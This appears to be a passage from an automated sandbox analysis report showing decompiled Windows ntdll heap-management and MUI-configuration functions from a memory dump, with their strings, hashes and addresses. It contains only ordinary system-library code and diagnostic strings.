                • *** Inpage error in %ws:%s, xrefs: 0194B418
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                • API String ID: 0-108210295
                • Opcode ID: b8948c3d847844ee0fdd5df42463af9fee03e147d10cdb2f785c0847a4b6b41d
                • Instruction ID: 205864ddb034f3b507504d6cbdd9b0a0b3fbd801c9dd46eda507b7b73253c8bc
                • Opcode Fuzzy Hash: b8948c3d847844ee0fdd5df42463af9fee03e147d10cdb2f785c0847a4b6b41d
                • Instruction Fuzzy Hash: F1812735A41210FFEB216A4ACC85EBB3F2AAF96B52F014148F50D9B256D265C601D7B2
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 44%
                			E01951C06() {
                				signed int _t27;
                				char* _t104;
                				char* _t105;
                				intOrPtr _t113;
                				intOrPtr _t115;
                				intOrPtr _t117;
                				intOrPtr _t119;
                				intOrPtr _t120;
                
                				_t105 = 0x18748a4;
                				_t104 = "HEAP: ";
                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                					_push(_t104);
                					E0189B150();
                				} else {
                					E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                				}
                				_push( *0x198589c);
                				E0189B150("Heap error detected at %p (heap handle %p)\n",  *0x19858a0);
                				_t27 =  *0x1985898; // 0x0
                				if(_t27 <= 0xf) {
                					switch( *((intOrPtr*)(_t27 * 4 +  &M01951E96))) {
                						case 0:
                							_t105 = "heap_failure_internal";
                							goto L21;
                						case 1:
                							goto L21;
                						case 2:
                							goto L21;
                						case 3:
                							goto L21;
                						case 4:
                							goto L21;
                						case 5:
                							goto L21;
                						case 6:
                							goto L21;
                						case 7:
                							goto L21;
                						case 8:
                							goto L21;
                						case 9:
                							goto L21;
                						case 0xa:
                							goto L21;
                						case 0xb:
                							goto L21;
                						case 0xc:
                							goto L21;
                						case 0xd:
                							goto L21;
                						case 0xe:
                							goto L21;
                						case 0xf:
                							goto L21;
                					}
                				}
                				L21:
                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                					_push(_t104);
                					E0189B150();
                				} else {
                					E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                				}
                				_push(_t105);
                				E0189B150("Error code: %d - %s\n",  *0x1985898);
                				_t113 =  *0x19858a4; // 0x0
                				if(_t113 != 0) {
                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                						_push(_t104);
                						E0189B150();
                					} else {
                						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                					}
                					E0189B150("Parameter1: %p\n",  *0x19858a4);
                				}
                				_t115 =  *0x19858a8; // 0x0
                				if(_t115 != 0) {
                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                						_push(_t104);
                						E0189B150();
                					} else {
                						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                					}
                					E0189B150("Parameter2: %p\n",  *0x19858a8);
                				}
                				_t117 =  *0x19858ac; // 0x0
                				if(_t117 != 0) {
                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                						_push(_t104);
                						E0189B150();
                					} else {
                						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                					}
                					E0189B150("Parameter3: %p\n",  *0x19858ac);
                				}
                				_t119 =  *0x19858b0; // 0x0
                				if(_t119 != 0) {
                					L41:
                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                						_push(_t104);
                						E0189B150();
                					} else {
                						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                					}
                					_push( *0x19858b4);
                					E0189B150("Last known valid blocks: before - %p, after - %p\n",  *0x19858b0);
                				} else {
                					_t120 =  *0x19858b4; // 0x0
                					if(_t120 != 0) {
                						goto L41;
                					}
                				}
                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                					_push(_t104);
                					E0189B150();
                				} else {
                					E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                				}
                				return E0189B150("Stack trace available at %p\n", 0x19858c0);
                			}

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                • API String ID: 0-2897834094
                • Opcode ID: 911e8466ca1195c20a1a03120ee03ca42cbd6e603d863dcfb1adfcb44d5d65a4
                • Instruction ID: 8c9ffb38db90a38c4d9460b832dd019b6840eddf2c8da517139ec14880fa2bb6
                • Opcode Fuzzy Hash: 911e8466ca1195c20a1a03120ee03ca42cbd6e603d863dcfb1adfcb44d5d65a4
                • Instruction Fuzzy Hash: 3361D432925985DFE751FB89E484F2473A4EB04B21B0E843AF90DFB311D6649A44CB1B
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E018A3D34(signed int* __ecx) {
                				signed int* _v8;
                				char _v12;
                				signed int* _v16;
                				signed int* _v20;
                				char _v24;
                				signed int _v28;
                				signed int _v32;
                				char _v36;
                				signed int _v40;
                				signed int _v44;
                				signed int* _v48;
                				signed int* _v52;
                				signed int _v56;
                				signed int _v60;
                				char _v68;
                				signed int _t140;
                				signed int _t161;
                				signed int* _t236;
                				signed int* _t242;
                				signed int* _t243;
                				signed int* _t244;
                				signed int* _t245;
                				signed int _t255;
                				void* _t257;
                				signed int _t260;
                				void* _t262;
                				signed int _t264;
                				void* _t267;
                				signed int _t275;
                				signed int* _t276;
                				short* _t277;
                				signed int* _t278;
                				signed int* _t279;
                				signed int* _t280;
                				short* _t281;
                				signed int* _t282;
                				short* _t283;
                				signed int* _t284;
                				void* _t285;
                
                				_v60 = _v60 | 0xffffffff;
                				_t280 = 0;
                				_t242 = __ecx;
                				_v52 = __ecx;
                				_v8 = 0;
                				_v20 = 0;
                				_v40 = 0;
                				_v28 = 0;
                				_v32 = 0;
                				_v44 = 0;
                				_v56 = 0;
                				_t275 = 0;
                				_v16 = 0;
                				if(__ecx == 0) {
                					_t280 = 0xc000000d;
                					_t140 = 0;
                					L50:
                					 *_t242 =  *_t242 | 0x00000800;
                					_t242[0x13] = _t140;
                					_t242[0x16] = _v40;
                					_t242[0x18] = _v28;
                					_t242[0x14] = _v32;
                					_t242[0x17] = _t275;
                					_t242[0x15] = _v44;
                					_t242[0x11] = _v56;
                					_t242[0x12] = _v60;
                					return _t280;
                				}
                				if(E018A1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                					_v56 = 1;
                					if(_v8 != 0) {
                						L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                					}
                					_v8 = _t280;
                				}
                				if(E018A1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                					_v60 =  *_v8;
                					L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                					_v8 = _t280;
                				}
                				if(E018A1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                					L16:
                					if(E018A1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                						L28:
                						if(E018A1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                							L46:
                							_t275 = _v16;
                							L47:
                							_t161 = 0;
                							L48:
                							if(_v8 != 0) {
                								L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                							}
                							_t140 = _v20;
                							if(_t140 != 0) {
                								if(_t275 != 0) {
                									L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                									_t275 = 0;
                									_v28 = 0;
                									_t140 = _v20;
                								}
                							}
                							goto L50;
                						}
                						_t167 = _v12;
                						_t255 = _v12 + 4;
                						_v44 = _t255;
                						if(_t255 == 0) {
                							_t276 = _t280;
                							_v32 = _t280;
                						} else {
                							_t276 = L018B4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                							_t167 = _v12;
                							_v32 = _t276;
                						}
                						if(_t276 == 0) {
                							_v44 = _t280;
                							_t280 = 0xc0000017;
                							goto L46;
                						} else {
                							E018DF3E0(_t276, _v8, _t167);
                							_v48 = _t276;
                							_t277 = E018E1370(_t276, 0x1874e90);
                							_pop(_t257);
                							if(_t277 == 0) {
                								L38:
                								_t170 = _v48;
                								if( *_v48 != 0) {
                									E018DBB40(0,  &_v68, _t170);
                									if(L018A43C0( &_v68,  &_v24) != 0) {
                										_t280 =  &(_t280[0]);
                									}
                								}
                								if(_t280 == 0) {
                									_t280 = 0;
                									L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                									_v44 = 0;
                									_v32 = 0;
                								} else {
                									_t280 = 0;
                								}
                								_t174 = _v8;
                								if(_v8 != 0) {
                									L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                								}
                								_v8 = _t280;
                								goto L46;
                							}
                							_t243 = _v48;
                							do {
                								 *_t277 = 0;
                								_t278 = _t277 + 2;
                								E018DBB40(_t257,  &_v68, _t243);
                								if(L018A43C0( &_v68,  &_v24) != 0) {
                									_t280 =  &(_t280[0]);
                								}
                								_t243 = _t278;
                								_t277 = E018E1370(_t278, 0x1874e90);
                								_pop(_t257);
                							} while (_t277 != 0);
                							_v48 = _t243;
                							_t242 = _v52;
                							goto L38;
                						}
                					}
                					_t191 = _v12;
                					_t260 = _v12 + 4;
                					_v28 = _t260;
                					if(_t260 == 0) {
                						_t275 = _t280;
                						_v16 = _t280;
                					} else {
                						_t275 = L018B4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                						_t191 = _v12;
                						_v16 = _t275;
                					}
                					if(_t275 == 0) {
                						_v28 = _t280;
                						_t280 = 0xc0000017;
                						goto L47;
                					} else {
                						E018DF3E0(_t275, _v8, _t191);
                						_t285 = _t285 + 0xc;
                						_v48 = _t275;
                						_t279 = _t280;
                						_t281 = E018E1370(_v16, 0x1874e90);
                						_pop(_t262);
                						if(_t281 != 0) {
                							_t244 = _v48;
                							do {
                								 *_t281 = 0;
                								_t282 = _t281 + 2;
                								E018DBB40(_t262,  &_v68, _t244);
                								if(L018A43C0( &_v68,  &_v24) != 0) {
                									_t279 =  &(_t279[0]);
                								}
                								_t244 = _t282;
                								_t281 = E018E1370(_t282, 0x1874e90);
                								_pop(_t262);
                							} while (_t281 != 0);
                							_v48 = _t244;
                							_t242 = _v52;
                						}
                						_t201 = _v48;
                						_t280 = 0;
                						if( *_v48 != 0) {
                							E018DBB40(_t262,  &_v68, _t201);
                							if(L018A43C0( &_v68,  &_v24) != 0) {
                								_t279 =  &(_t279[0]);
                							}
                						}
                						if(_t279 == 0) {
                							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                							_v28 = _t280;
                							_v16 = _t280;
                						}
                						_t202 = _v8;
                						if(_v8 != 0) {
                							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                						}
                						_v8 = _t280;
                						goto L28;
                					}
                				}
                				_t214 = _v12;
                				_t264 = _v12 + 4;
                				_v40 = _t264;
                				if(_t264 == 0) {
                					_v20 = _t280;
                				} else {
                					_t236 = L018B4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                					_t280 = _t236;
                					_v20 = _t236;
                					_t214 = _v12;
                				}
                				if(_t280 == 0) {
                					_t161 = 0;
                					_t280 = 0xc0000017;
                					_v40 = 0;
                					goto L48;
                				} else {
                					E018DF3E0(_t280, _v8, _t214);
                					_t285 = _t285 + 0xc;
                					_v48 = _t280;
                					_t283 = E018E1370(_t280, 0x1874e90);
                					_pop(_t267);
                					if(_t283 != 0) {
                						_t245 = _v48;
                						do {
                							 *_t283 = 0;
                							_t284 = _t283 + 2;
                							E018DBB40(_t267,  &_v68, _t245);
                							if(L018A43C0( &_v68,  &_v24) != 0) {
                								_t275 = _t275 + 1;
                							}
                							_t245 = _t284;
                							_t283 = E018E1370(_t284, 0x1874e90);
                							_pop(_t267);
                						} while (_t283 != 0);
                						_v48 = _t245;
                						_t242 = _v52;
                					}
                					_t224 = _v48;
                					_t280 = 0;
                					if( *_v48 != 0) {
                						E018DBB40(_t267,  &_v68, _t224);
                						if(L018A43C0( &_v68,  &_v24) != 0) {
                							_t275 = _t275 + 1;
                						}
                					}
                					if(_t275 == 0) {
                						L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                						_v40 = _t280;
                						_v20 = _t280;
                					}
                					_t225 = _v8;
                					if(_v8 != 0) {
                						L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                					}
                					_v8 = _t280;
                					goto L16;
                				}
                			}

                Strings
                • Kernel-MUI-Language-Allowed, xrefs: 018A3DC0
                • Kernel-MUI-Number-Allowed, xrefs: 018A3D8C
                • Kernel-MUI-Language-SKU, xrefs: 018A3F70
                • WindowsExcludedProcs, xrefs: 018A3D6F
                • Kernel-MUI-Language-Disallowed, xrefs: 018A3E97
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                • API String ID: 0-258546922
                • Opcode ID: d90b2506a9a0d80a8f3a42d70fc6d5a4b37e2fbe98dfda57ac5eafa64e8539f9
                • Instruction ID: 6a1811e3cd96d4d6524b2f30269fb0554baa0e02ed2b3048cf1d2c0a57cfbdc9
                • Opcode Fuzzy Hash: d90b2506a9a0d80a8f3a42d70fc6d5a4b37e2fbe98dfda57ac5eafa64e8539f9
                • Instruction Fuzzy Hash: 9FF14872D00619EBDB11DF98C980AEEBBB9FF59750F15006AEA05E7250E7749F01CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 29%
                			E018940E1(void* __edx) {
                				void* _t19;
                				void* _t29;
                
                				_t28 = _t19;
                				_t29 = __edx;
                				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                						_push("HEAP: ");
                						E0189B150();
                					} else {
                						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                					}
                					E0189B150("Invalid heap signature for heap at %p", _t28);
                					if(_t29 != 0) {
                						E0189B150(", passed to %s", _t29);
                					}
                					_push("\n");
                					E0189B150();
                					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                						 *0x1986378 = 1;
                						asm("int3");
                						 *0x1986378 = 0;
                					}
                					return 0;
                				}
                				return 1;
                			}

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                • API String ID: 0-188067316
                • Opcode ID: 200b5fe93469a4c0b20d651e0f3cf7327133aea1022151d50131b243e8dcd5a4
                • Instruction ID: 10c706ca7c52b17eeb82715b0a33f8b3f0bf3799578abf41751b4c0f7031f374
                • Opcode Fuzzy Hash: 200b5fe93469a4c0b20d651e0f3cf7327133aea1022151d50131b243e8dcd5a4
                • Instruction Fuzzy Hash: 13012832104A419EE725976DA48DFA677A4DB12F34F2C407EF105CB752DAE8D640C621
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 70%
                			E018BA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
                				void* _v5;
                				signed short _v12;
                				intOrPtr _v16;
                				signed int _v20;
                				signed short _v24;
                				signed short _v28;
                				signed int _v32;
                				signed short _v36;
                				signed int _v40;
                				intOrPtr _v44;
                				intOrPtr _v48;
                				signed short* _v52;
                				void* __ebx;
                				void* __edi;
                				void* __ebp;
                				signed int _t131;
                				signed char _t134;
                				signed int _t138;
                				char _t141;
                				signed short _t142;
                				void* _t146;
                				signed short _t147;
                				intOrPtr* _t149;
                				intOrPtr _t156;
                				signed int _t167;
                				signed int _t168;
                				signed short* _t173;
                				signed short _t174;
                				intOrPtr* _t182;
                				signed short _t184;
                				intOrPtr* _t187;
                				intOrPtr _t197;
                				intOrPtr _t206;
                				intOrPtr _t210;
                				signed short _t211;
                				intOrPtr* _t212;
                				signed short _t214;
                				signed int _t216;
                				intOrPtr _t217;
                				signed char _t225;
                				signed short _t235;
                				signed int _t237;
                				intOrPtr* _t238;
                				signed int _t242;
                				unsigned int _t245;
                				signed int _t251;
                				intOrPtr* _t252;
                				signed int _t253;
                				intOrPtr* _t255;
                				signed int _t256;
                				void* _t257;
                				void* _t260;
                
                				_t256 = __edx;
                				_t206 = __ecx;
                				_t235 = _a4;
                				_v44 = __ecx;
                				_v24 = _t235;
                				if(_t235 == 0) {
                					L41:
                					return _t131;
                				}
                				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
                				if(_t251 == 0) {
                					__eflags =  *0x1988748 - 1;
                					if( *0x1988748 >= 1) {
                						__eflags =  *(__edx + 2) & 0x00000008;
                						if(( *(__edx + 2) & 0x00000008) == 0) {
                							_t110 = _t256 + 0xfff; // 0xfe7
                							__eflags = (_t110 & 0xfffff000) - __edx;
                							if((_t110 & 0xfffff000) != __edx) {
                								_t197 =  *[fs:0x30];
                								__eflags =  *(_t197 + 0xc);
                								if( *(_t197 + 0xc) == 0) {
                									_push("HEAP: ");
                									E0189B150();
                									_t260 = _t257 + 4;
                								} else {
                									E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                									_t260 = _t257 + 8;
                								}
                								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
                								E0189B150();
                								_t257 = _t260 + 4;
                								__eflags =  *0x1987bc8;
                								if(__eflags == 0) {
                									E01952073(_t206, 1, _t251, __eflags);
                								}
                								_t235 = _v24;
                							}
                						}
                					}
                				}
                				_t134 =  *((intOrPtr*)(_t256 + 6));
                				if(_t134 == 0) {
                					_t210 = _t206;
                					_v48 = _t206;
                				} else {
                					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                					_v48 = _t210;
                				}
                				_v5 =  *(_t256 + 2);
                				do {
                					if(_t235 > 0xfe00) {
                						_v12 = 0xfe00;
                						__eflags = _t235 - 0xfe01;
                						if(_t235 == 0xfe01) {
                							_v12 = 0xfdf0;
                						}
                						_t138 = 0;
                					} else {
                						_v12 = _t235 & 0x0000ffff;
                						_t138 = _v5;
                					}
                					 *(_t256 + 2) = _t138;
                					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
                					_t236 =  *((intOrPtr*)(_t210 + 0x18));
                					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
                						_t141 = 0;
                					} else {
                						_t141 = (_t256 - _t210 >> 0x10) + 1;
                						_v40 = _t141;
                						if(_t141 >= 0xfe) {
                							_push(_t210);
                							E0195A80D(_t236, _t256, _t210, 0);
                							_t141 = _v40;
                						}
                					}
                					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
                					 *((char*)(_t256 + 6)) = _t141;
                					_t142 = _v12;
                					 *_t256 = _t142;
                					 *(_t256 + 3) = 0;
                					_t211 = _t142 & 0x0000ffff;
                					 *((char*)(_t256 + 7)) = 0;
                					_v20 = _t211;
                					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
                						_t119 = _t256 + 0x10; // -8
                						E018ED5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
                						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
                						_t211 = _v20;
                					}
                					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
                					if(_t252 == 0) {
                						L56:
                						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
                						_t146 = _t206 + 0xc0;
                						goto L19;
                					} else {
                						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
                							L15:
                							_t185 = _t211;
                							goto L17;
                						} else {
                							while(1) {
                								_t187 =  *_t252;
                								if(_t187 == 0) {
                									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
                									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
                									goto L17;
                								}
                								_t252 = _t187;
                								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
                									continue;
                								}
                								goto L15;
                							}
                							while(1) {
                								L17:
                								_t212 = E018BAB40(_t206, _t252, 1, _t185, _t211);
                								if(_t212 != 0) {
                									_t146 = _t206 + 0xc0;
                									break;
                								}
                								_t252 =  *_t252;
                								_t211 = _v20;
                								_t185 =  *(_t252 + 0x14);
                							}
                							L19:
                							if(_t146 != _t212) {
                								_t237 =  *(_t206 + 0x4c);
                								_t253 = _v20;
                								while(1) {
                									__eflags = _t237;
                									if(_t237 == 0) {
                										_t147 =  *(_t212 - 8) & 0x0000ffff;
                									} else {
                										_t184 =  *(_t212 - 8);
                										_t237 =  *(_t206 + 0x4c);
                										__eflags = _t184 & _t237;
                										if((_t184 & _t237) != 0) {
                											_t184 = _t184 ^  *(_t206 + 0x50);
                											__eflags = _t184;
                										}
                										_t147 = _t184 & 0x0000ffff;
                									}
                									__eflags = _t253 - (_t147 & 0x0000ffff);
                									if(_t253 <= (_t147 & 0x0000ffff)) {
                										goto L20;
                									}
                									_t212 =  *_t212;
                									__eflags = _t206 + 0xc0 - _t212;
                									if(_t206 + 0xc0 != _t212) {
                										continue;
                									} else {
                										goto L20;
                									}
                									goto L56;
                								}
                							}
                							L20:
                							_t149 =  *((intOrPtr*)(_t212 + 4));
                							_t33 = _t256 + 8; // -16
                							_t238 = _t33;
                							_t254 =  *_t149;
                							if( *_t149 != _t212) {
                								_push(_t212);
                								E0195A80D(0, _t212, 0, _t254);
                							} else {
                								 *_t238 = _t212;
                								 *((intOrPtr*)(_t238 + 4)) = _t149;
                								 *_t149 = _t238;
                								 *((intOrPtr*)(_t212 + 4)) = _t238;
                							}
                							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
                							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
                							if(_t255 == 0) {
                								L36:
                								if( *(_t206 + 0x4c) != 0) {
                									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
                									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
                								}
                								_t210 = _v48;
                								_t251 = _v12 & 0x0000ffff;
                								_t131 = _v20;
                								_t235 = _v24 - _t131;
                								_v24 = _t235;
                								_t256 = _t256 + _t131 * 8;
                								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
                									goto L41;
                								} else {
                									goto L39;
                								}
                							} else {
                								_t216 =  *_t256 & 0x0000ffff;
                								_v28 = _t216;
                								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
                									L28:
                									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
                									_v32 = _t242;
                									if( *((intOrPtr*)(_t255 + 8)) != 0) {
                										_t167 = _t242 + _t242;
                									} else {
                										_t167 = _t242;
                									}
                									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
                									_t168 = _t167 << 2;
                									_v40 = _t168;
                									_t206 = _v44;
                									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
                									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
                										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
                									}
                									_t217 = _v16;
                									if(_t217 != 0) {
                										_t173 = _t217 - 8;
                										_v52 = _t173;
                										_t174 =  *_t173;
                										__eflags =  *(_t206 + 0x4c);
                										if( *(_t206 + 0x4c) != 0) {
                											_t245 =  *(_t206 + 0x50) ^ _t174;
                											_v36 = _t245;
                											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
                											__eflags = _t245 >> 0x18 - _t225;
                											if(_t245 >> 0x18 != _t225) {
                												_push(_t225);
                												E0195A80D(_t206, _v52, 0, 0);
                											}
                											_t174 = _v36;
                											_t217 = _v16;
                											_t242 = _v32;
                										}
                										_v28 = _v28 - (_t174 & 0x0000ffff);
                										__eflags = _v28;
                										if(_v28 > 0) {
                											goto L34;
                										} else {
                											goto L33;
                										}
                									} else {
                										L33:
                										_t58 = _t256 + 8; // -16
                										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
                										_t206 = _v44;
                										_t217 = _v16;
                										L34:
                										if(_t217 == 0) {
                											asm("bts eax, edx");
                										}
                										goto L36;
                									}
                								} else {
                									goto L24;
                								}
                								while(1) {
                									L24:
                									_t182 =  *_t255;
                									if(_t182 == 0) {
                										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
                										__eflags = _t216;
                										goto L28;
                									}
                									_t255 = _t182;
                									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
                										continue;
                									} else {
                										goto L28;
                									}
                								}
                								goto L28;
                							}
                						}
                					}
                					L39:
                				} while (_t235 != 0);
                				_t214 = _v12;
                				_t131 =  *(_t206 + 0x54) ^ _t214;
                				 *(_t256 + 4) = _t131;
                				if(_t214 == 0) {
                					__eflags =  *0x1988748 - 1;
                					if( *0x1988748 >= 1) {
                						_t127 = _t256 + 0xfff; // 0xfff
                						_t131 = _t127 & 0xfffff000;
                						__eflags = _t131 - _t256;
                						if(_t131 != _t256) {
                							_t156 =  *[fs:0x30];
                							__eflags =  *(_t156 + 0xc);
                							if( *(_t156 + 0xc) == 0) {
                								_push("HEAP: ");
                								E0189B150();
                							} else {
                								E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                							}
                							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
                							_t131 = E0189B150();
                							__eflags =  *0x1987bc8;
                							if(__eflags == 0) {
                								_t131 = E01952073(_t206, 1, _t251, __eflags);
                							}
                						}
                					}
                				}
                				goto L41;
                			}

                0x018ba83a
                0x018ba83c
                0x018ba83e
                0x018ba841
                0x018ba844
                0x018ba84a
                0x018baa53
                0x018baa59
                0x018baa59
                0x018ba858
                0x018ba85e
                0x018baaf5
                0x018baafc
                0x0190229e
                0x019022a2
                0x019022a8
                0x019022b3
                0x019022b5
                0x019022bb
                0x019022c1
                0x019022c5
                0x019022e6
                0x019022eb
                0x019022f0
                0x019022c7
                0x019022dc
                0x019022e1
                0x019022e1
                0x019022f3
                0x019022f8
                0x019022fd
                0x01902300
                0x01902307
                0x0190230e
                0x0190230e
                0x01902313
                0x01902313
                0x019022b5
                0x019022a2
                0x018baafc
                0x018ba864
                0x018ba869
                0x018baa5c
                0x018baa5e
                0x018ba86f
                0x018ba87f
                0x018ba885
                0x018ba885
                0x018ba88b
                0x018ba890
